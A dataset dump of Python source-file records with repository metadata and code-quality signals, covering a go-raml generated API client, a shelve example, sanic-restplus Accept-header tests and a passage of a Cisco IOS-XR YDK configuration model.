hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
218490b320be760e2cca027e0537fd5f2c5a847d
| 2,540
|
py
|
Python
|
codegen/python/fixtures/method/client/complex_body/requests_unmarshall/arrays_service.py
|
feeltheajf/go-raml
|
57ce1f4c47bca464efee03cb4a7a28efcd00bea2
|
[
"BSD-2-Clause"
] | null | null | null |
codegen/python/fixtures/method/client/complex_body/requests_unmarshall/arrays_service.py
|
feeltheajf/go-raml
|
57ce1f4c47bca464efee03cb4a7a28efcd00bea2
|
[
"BSD-2-Clause"
] | null | null | null |
codegen/python/fixtures/method/client/complex_body/requests_unmarshall/arrays_service.py
|
feeltheajf/go-raml
|
57ce1f4c47bca464efee03cb4a7a28efcd00bea2
|
[
"BSD-2-Clause"
] | null | null | null |
# DO NOT EDIT THIS FILE. This file will be overwritten when re-running go-raml.
from .Animal import Animal
from .unhandled_api_error import UnhandledAPIError
from .unmarshall_error import UnmarshallError
class ArraysService:
"""
auto-generated. don't touch.
"""
@staticmethod
def _get_methods():
return (("arrays_post", "Animal"), ("arrays_put", "Animal"))
def __init__(self, client):
self.client = client
def arrays_post(
self,
data,
headers=None,
query_params=None,
content_type="application/json",
):
"""
handle array
It is method for POST /arrays
"""
if query_params is None:
query_params = {}
uri = self.client.base_url + "/arrays"
resp = self.client.post(uri, data, headers, query_params, content_type)
try:
if resp.status_code == 201:
resps = []
for elem in resp.json():
resps.append(Animal(elem))
return resps, resp
message = "unknown status code={}".format(resp.status_code)
raise UnhandledAPIError(
response=resp, code=resp.status_code, message=message
)
except ValueError as msg:
raise UnmarshallError(resp, msg)
except UnhandledAPIError as uae:
raise uae
except Exception as e:
raise UnmarshallError(resp, e.message)
def arrays_put(
self,
data,
headers=None,
query_params=None,
content_type="application/json",
):
"""
another form of array
It is method for PUT /arrays
"""
if query_params is None:
query_params = {}
uri = self.client.base_url + "/arrays"
resp = self.client.put(uri, data, headers, query_params, content_type)
try:
if resp.status_code == 200:
resps = []
for elem in resp.json():
resps.append(Animal(elem))
return resps, resp
message = "unknown status code={}".format(resp.status_code)
raise UnhandledAPIError(
response=resp, code=resp.status_code, message=message
)
except ValueError as msg:
raise UnmarshallError(resp, msg)
except UnhandledAPIError as uae:
raise uae
except Exception as e:
raise UnmarshallError(resp, e.message)
| 29.534884
| 79
| 0.559449
| 269
| 2,540
| 5.159851
| 0.312268
| 0.063401
| 0.060519
| 0.027378
| 0.736311
| 0.710375
| 0.710375
| 0.710375
| 0.710375
| 0.710375
| 0
| 0.003656
| 0.353937
| 2,540
| 85
| 80
| 29.882353
| 0.842169
| 0.079134
| 0
| 0.730159
| 1
| 0
| 0.054401
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.063492
| false
| 0
| 0.047619
| 0.015873
| 0.174603
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
df803eab0a65180054edee43656e390d645a1664
| 70
|
py
|
Python
|
molsysmt/tools/file_xyznpy/__init__.py
|
dprada/molsysmt
|
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
|
[
"MIT"
] | null | null | null |
molsysmt/tools/file_xyznpy/__init__.py
|
dprada/molsysmt
|
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
|
[
"MIT"
] | null | null | null |
molsysmt/tools/file_xyznpy/__init__.py
|
dprada/molsysmt
|
83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d
|
[
"MIT"
] | null | null | null |
from .is_file_xyznpy import is_file_xyznpy
from .to_XYZ import to_XYZ
| 23.333333
| 42
| 0.857143
| 14
| 70
| 3.857143
| 0.5
| 0.222222
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 70
| 2
| 43
| 35
| 0.870968
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
10e36486204e56af6aae56d57ccbad8d58676b51
| 444
|
py
|
Python
|
Chapter06/io_05.py
|
vabyte/Modern-Python-Standard-Library-Cookbook
|
4f53e3ab7b61aca1cca9343e7421e170280cd5b5
|
[
"MIT"
] | 84
|
2018-08-09T09:30:03.000Z
|
2022-01-04T23:20:38.000Z
|
Chapter06/io_05.py
|
jiro74/Modern-Python-Standard-Library-Cookbook
|
4f53e3ab7b61aca1cca9343e7421e170280cd5b5
|
[
"MIT"
] | 1
|
2019-11-04T18:57:40.000Z
|
2020-09-07T08:52:25.000Z
|
Chapter06/io_05.py
|
jiro74/Modern-Python-Standard-Library-Cookbook
|
4f53e3ab7b61aca1cca9343e7421e170280cd5b5
|
[
"MIT"
] | 33
|
2018-09-26T11:05:55.000Z
|
2022-03-15T10:31:10.000Z
|
import shelve
with shelve.open('/tmp/shelf.db') as shelf:
shelf['value'] = 5
with shelve.open('/tmp/shelf.db') as shelf:
print(shelf['value'])
class MyClass(object):
def __init__(self, value):
self.value = value
with shelve.open('/tmp/shelf.db') as shelf:
shelf['value'] = MyClass(5)
with shelve.open('/tmp/shelf.db') as shelf:
print(shelf['value'])
with shelve.open('/tmp/shelf.db') as shelf:
print(shelf['value'].value)
| 21.142857
| 43
| 0.671171
| 69
| 444
| 4.26087
| 0.246377
| 0.170068
| 0.238095
| 0.289116
| 0.772109
| 0.772109
| 0.772109
| 0.772109
| 0.772109
| 0.755102
| 0
| 0.005222
| 0.137387
| 444
| 20
| 44
| 22.2
| 0.762402
| 0
| 0
| 0.5
| 0
| 0
| 0.202703
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.071429
| 0
| 0.214286
| 0.214286
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
10ea855b92b87fc8d0d8c2c13cfaebe624b62749
| 5,883
|
py
|
Python
|
tests/test_accept.py
|
alex-ip/sanic-restplus
|
6f07af56b96eb9039622ecfe592a730e6e7e9d90
|
[
"MIT"
] | 115
|
2017-04-04T22:30:45.000Z
|
2022-03-28T01:52:48.000Z
|
tests/test_accept.py
|
alex-ip/sanic-restplus
|
6f07af56b96eb9039622ecfe592a730e6e7e9d90
|
[
"MIT"
] | 24
|
2017-06-09T01:03:49.000Z
|
2021-08-31T01:45:41.000Z
|
tests/test_accept.py
|
alex-ip/sanic-restplus
|
6f07af56b96eb9039622ecfe592a730e6e7e9d90
|
[
"MIT"
] | 21
|
2017-04-22T19:41:11.000Z
|
2022-03-02T04:00:02.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import sanic_restplus
from sanic_restplus import restplus
from sanic.response import HTTPResponse
class Foo(sanic_restplus.Resource):
async def get(self, request):
return "data", 200
class ErrorsTest(object):
async def test_accept_default_application_json(self, app, client):
api = sanic_restplus.Api(app)
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers={'Accept': ''})
assert res.status == 200
assert res.content_type == 'application/json'
async def test_accept_application_json_by_default(self, app, client):
api = sanic_restplus.Api(app)
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', 'application/json')])
assert res.status == 200
assert res.content_type == 'application/json'
async def test_accept_no_default_match_acceptable(self, app, client):
api = sanic_restplus.Api(app, default_mediatype=None)
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', 'application/json')])
assert res.status == 200
assert res.content_type == 'application/json'
async def test_accept_default_override_accept(self, app, client):
api = sanic_restplus.Api(app)
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', 'text/plain')])
assert res.status == 200
assert res.content_type == 'application/json'
async def test_accept_default_any_pick_first(self, app, client):
api = sanic_restplus.Api(app)
@api.representation('text/plain')
def text_rep(data, status_code, headers=None):
resp = HTTPResponse(str(data), status_code, headers)
return resp
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', '*/*')])
assert res.status == 200
assert res.content_type == 'application/json'
async def test_accept_no_default_no_match_not_acceptable(self, app, client):
api = sanic_restplus.Api(app, default_mediatype=None)
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', 'text/plain')])
assert res.status == 406
assert res.content_type == 'application/json'
async def test_accept_no_default_custom_repr_match(self, app, client):
api = sanic_restplus.Api(app, default_mediatype=None)
api.representations = {}
@api.representation('text/plain')
def text_rep(request, data, status_code, headers=None):
resp = HTTPResponse(str(data), status_code, headers)
return resp
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', 'text/plain')])
assert res.status == 200
assert res.content_type == 'text/plain'
async def test_accept_no_default_custom_repr_not_acceptable(self, app, client):
api = sanic_restplus.Api(app, default_mediatype=None)
api.representations = {}
@api.representation('text/plain')
def text_rep(request, data, status_code, headers=None):
resp = HTTPResponse(str(data), status_code, headers)
return resp
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', 'application/json')])
assert res.status == 406
assert res.content_type == 'text/plain'
async def test_accept_no_default_match_q0_not_acceptable(self, app, client):
"""
q=0 should be considered NotAcceptable,
"""
api = sanic_restplus.Api(app, default_mediatype=None)
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', 'application/json; q=0')])
assert res.status == 406
async def test_accept_no_default_accept_highest_quality_of_two(self, app, client):
api = sanic_restplus.Api(app, default_mediatype=None)
@api.representation('text/plain')
def text_rep(request, data, status_code, headers=None):
resp = HTTPResponse(str(data), status_code, headers)
return resp
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', 'application/json; q=0.1, text/plain; q=1.0')])
assert res.status == 200
assert res.content_type == 'text/plain'
async def test_accept_no_default_accept_highest_quality_of_three(self, app, client):
api = sanic_restplus.Api(app, default_mediatype=None)
@api.representation('text/html')
@api.representation('text/plain')
def text_rep(request, data, status_code, headers=None):
resp = HTTPResponse(str(data), status_code, headers)
return resp
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', 'application/json; q=0.1, text/plain; q=0.3, text/html; q=0.2')])
assert res.status == 200
assert res.content_type == 'text/plain'
async def test_accept_no_default_no_representations(self, app, client):
api = sanic_restplus.Api(app, default_mediatype=None)
api.representations = {}
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', 'text/plain')])
assert res.status == 406
assert res.content_type == 'text/plain'
async def test_accept_invalid_default_no_representations(self, app, client):
api = sanic_restplus.Api(app, default_mediatype='nonexistant/mediatype')
api.representations = {}
api.add_resource(Foo, '/test/')
res = await client.get('/test/', headers=[('Accept', 'text/plain')])
assert res.status == 500
| 38.201299
| 126
| 0.643719
| 730
| 5,883
| 4.989041
| 0.112329
| 0.059308
| 0.042834
| 0.06425
| 0.891269
| 0.877265
| 0.877265
| 0.864909
| 0.859418
| 0.848984
| 0
| 0.01224
| 0.222336
| 5,883
| 153
| 127
| 38.45098
| 0.783825
| 0.00357
| 0
| 0.724771
| 0
| 0.009174
| 0.118682
| 0.003623
| 0
| 0
| 0
| 0
| 0.220183
| 1
| 0.045872
| false
| 0
| 0.036697
| 0
| 0.155963
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8023d67808d5bb3156950deb9fb8d995de91f589
| 18,918
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_infra_rt_check_cfg.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 177
|
2016-03-15T17:03:51.000Z
|
2022-03-18T16:48:44.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_infra_rt_check_cfg.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 18
|
2016-03-30T10:45:22.000Z
|
2020-07-14T16:28:13.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_infra_rt_check_cfg.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 85
|
2016-03-16T20:38:57.000Z
|
2022-02-22T04:26:02.000Z
|
""" Cisco_IOS_XR_infra_rt_check_cfg
This module contains a collection of YANG definitions
for Cisco IOS\-XR infra\-rt\-check package configuration.
This module contains definitions
for the following management objects\:
rcc\: RCC (Route Consistency Checker) configuration
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class Rcc(_Entity_):
"""
RCC (Route Consistency Checker) configuration
.. attribute:: ipv6
RCC/LCC configuration for IPv6
**type**\: :py:class:`Ipv6 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_rt_check_cfg.Rcc.Ipv6>`
.. attribute:: ipv4
RCC/LCC configuration for IPv4
**type**\: :py:class:`Ipv4 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_rt_check_cfg.Rcc.Ipv4>`
"""
_prefix = 'infra-rt-check-cfg'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rcc, self).__init__()
self._top_entity = None
self.yang_name = "rcc"
self.yang_parent_name = "Cisco-IOS-XR-infra-rt-check-cfg"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("ipv6", ("ipv6", Rcc.Ipv6)), ("ipv4", ("ipv4", Rcc.Ipv4))])
self._leafs = OrderedDict()
self.ipv6 = Rcc.Ipv6()
self.ipv6.parent = self
self._children_name_map["ipv6"] = "ipv6"
self.ipv4 = Rcc.Ipv4()
self.ipv4.parent = self
self._children_name_map["ipv4"] = "ipv4"
self._segment_path = lambda: "Cisco-IOS-XR-infra-rt-check-cfg:rcc"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rcc, [], name, value)
class Ipv6(_Entity_):
"""
RCC/LCC configuration for IPv6
.. attribute:: lcc
IPv4/IPv6 LCC (Label Consistency Checker) configuration
**type**\: :py:class:`Lcc <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_rt_check_cfg.Rcc.Ipv6.Lcc>`
.. attribute:: unicast
RCC configuration for unicast
**type**\: :py:class:`Unicast <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_rt_check_cfg.Rcc.Ipv6.Unicast>`
.. attribute:: multicast
RCC configuration for multicast
**type**\: :py:class:`Multicast <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_rt_check_cfg.Rcc.Ipv6.Multicast>`
"""
_prefix = 'infra-rt-check-cfg'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rcc.Ipv6, self).__init__()
self.yang_name = "ipv6"
self.yang_parent_name = "rcc"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("lcc", ("lcc", Rcc.Ipv6.Lcc)), ("unicast", ("unicast", Rcc.Ipv6.Unicast)), ("multicast", ("multicast", Rcc.Ipv6.Multicast))])
self._leafs = OrderedDict()
self.lcc = Rcc.Ipv6.Lcc()
self.lcc.parent = self
self._children_name_map["lcc"] = "lcc"
self.unicast = Rcc.Ipv6.Unicast()
self.unicast.parent = self
self._children_name_map["unicast"] = "unicast"
self.multicast = Rcc.Ipv6.Multicast()
self.multicast.parent = self
self._children_name_map["multicast"] = "multicast"
self._segment_path = lambda: "ipv6"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-rt-check-cfg:rcc/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rcc.Ipv6, [], name, value)
class Lcc(_Entity_):
"""
IPv4/IPv6 LCC (Label Consistency Checker)
configuration
.. attribute:: period
Period of check in milliseconds
**type**\: int
**range:** 100..600000
**units**\: millisecond
.. attribute:: enable
Enable RCC/LCC
**type**\: :py:class:`Empty<ydk.types.Empty>`
"""
_prefix = 'infra-rt-check-cfg'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rcc.Ipv6.Lcc, self).__init__()
self.yang_name = "lcc"
self.yang_parent_name = "ipv6"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('period', (YLeaf(YType.uint32, 'period'), ['int'])),
('enable', (YLeaf(YType.empty, 'enable'), ['Empty'])),
])
self.period = None
self.enable = None
self._segment_path = lambda: "lcc"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-rt-check-cfg:rcc/ipv6/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rcc.Ipv6.Lcc, ['period', 'enable'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_rt_check_cfg as meta
return meta._meta_table['Rcc.Ipv6.Lcc']['meta_info']
class Unicast(_Entity_):
"""
RCC configuration for unicast
.. attribute:: period
Period of check in milliseconds
**type**\: int
**range:** 100..600000
**units**\: millisecond
.. attribute:: enable
Enable RCC/LCC
**type**\: :py:class:`Empty<ydk.types.Empty>`
"""
_prefix = 'infra-rt-check-cfg'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rcc.Ipv6.Unicast, self).__init__()
self.yang_name = "unicast"
self.yang_parent_name = "ipv6"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('period', (YLeaf(YType.uint32, 'period'), ['int'])),
('enable', (YLeaf(YType.empty, 'enable'), ['Empty'])),
])
self.period = None
self.enable = None
self._segment_path = lambda: "unicast"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-rt-check-cfg:rcc/ipv6/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rcc.Ipv6.Unicast, ['period', 'enable'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_rt_check_cfg as meta
return meta._meta_table['Rcc.Ipv6.Unicast']['meta_info']
class Multicast(_Entity_):
"""
RCC configuration for multicast
.. attribute:: period
Period of check in milliseconds
**type**\: int
**range:** 100..600000
**units**\: millisecond
.. attribute:: enable
Enable RCC/LCC
**type**\: :py:class:`Empty<ydk.types.Empty>`
"""
_prefix = 'infra-rt-check-cfg'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rcc.Ipv6.Multicast, self).__init__()
self.yang_name = "multicast"
self.yang_parent_name = "ipv6"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('period', (YLeaf(YType.uint32, 'period'), ['int'])),
('enable', (YLeaf(YType.empty, 'enable'), ['Empty'])),
])
self.period = None
self.enable = None
self._segment_path = lambda: "multicast"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-rt-check-cfg:rcc/ipv6/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rcc.Ipv6.Multicast, ['period', 'enable'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_rt_check_cfg as meta
return meta._meta_table['Rcc.Ipv6.Multicast']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_rt_check_cfg as meta
return meta._meta_table['Rcc.Ipv6']['meta_info']
class Ipv4(_Entity_):
"""
RCC/LCC configuration for IPv4
.. attribute:: lcc
IPv4/IPv6 LCC (Label Consistency Checker) configuration
**type**\: :py:class:`Lcc <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_rt_check_cfg.Rcc.Ipv4.Lcc>`
.. attribute:: unicast
RCC configuration for unicast
**type**\: :py:class:`Unicast <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_rt_check_cfg.Rcc.Ipv4.Unicast>`
.. attribute:: multicast
RCC configuration for multicast
**type**\: :py:class:`Multicast <ydk.models.cisco_ios_xr.Cisco_IOS_XR_infra_rt_check_cfg.Rcc.Ipv4.Multicast>`
"""
_prefix = 'infra-rt-check-cfg'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rcc.Ipv4, self).__init__()
self.yang_name = "ipv4"
self.yang_parent_name = "rcc"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("lcc", ("lcc", Rcc.Ipv4.Lcc)), ("unicast", ("unicast", Rcc.Ipv4.Unicast)), ("multicast", ("multicast", Rcc.Ipv4.Multicast))])
self._leafs = OrderedDict()
self.lcc = Rcc.Ipv4.Lcc()
self.lcc.parent = self
self._children_name_map["lcc"] = "lcc"
self.unicast = Rcc.Ipv4.Unicast()
self.unicast.parent = self
self._children_name_map["unicast"] = "unicast"
self.multicast = Rcc.Ipv4.Multicast()
self.multicast.parent = self
self._children_name_map["multicast"] = "multicast"
self._segment_path = lambda: "ipv4"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-rt-check-cfg:rcc/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rcc.Ipv4, [], name, value)
class Lcc(_Entity_):
"""
IPv4/IPv6 LCC (Label Consistency Checker)
configuration
.. attribute:: period
Period of check in milliseconds
**type**\: int
**range:** 100..600000
**units**\: millisecond
.. attribute:: enable
Enable RCC/LCC
**type**\: :py:class:`Empty<ydk.types.Empty>`
"""
_prefix = 'infra-rt-check-cfg'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rcc.Ipv4.Lcc, self).__init__()
self.yang_name = "lcc"
self.yang_parent_name = "ipv4"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('period', (YLeaf(YType.uint32, 'period'), ['int'])),
('enable', (YLeaf(YType.empty, 'enable'), ['Empty'])),
])
self.period = None
self.enable = None
self._segment_path = lambda: "lcc"
self._absolute_path = lambda: "Cisco-IOS-XR-infra-rt-check-cfg:rcc/ipv4/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rcc.Ipv4.Lcc, ['period', 'enable'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_infra_rt_check_cfg as meta
return meta._meta_table['Rcc.Ipv4.Lcc']['meta_info']
class Unicast(_Entity_):
"""
RCC configuration for unicast
.. attribute:: period
Period of check in milliseconds
**type**\: int
**range:** 100..600000
**units**\: millisecond
.. attribute:: enable
Enable RCC/LCC
**type**\: :py:class:`Empty<ydk.types.Empty>`
"""
_prefix = 'infra-rt-check-cfg'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rcc.Ipv4.Unicast, self).__init__()
self.yang_name = "unicast"
self.yang_parent_name = "ipv4"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('period', (YLeaf(YType.uint32, 'period'), ['int'])),
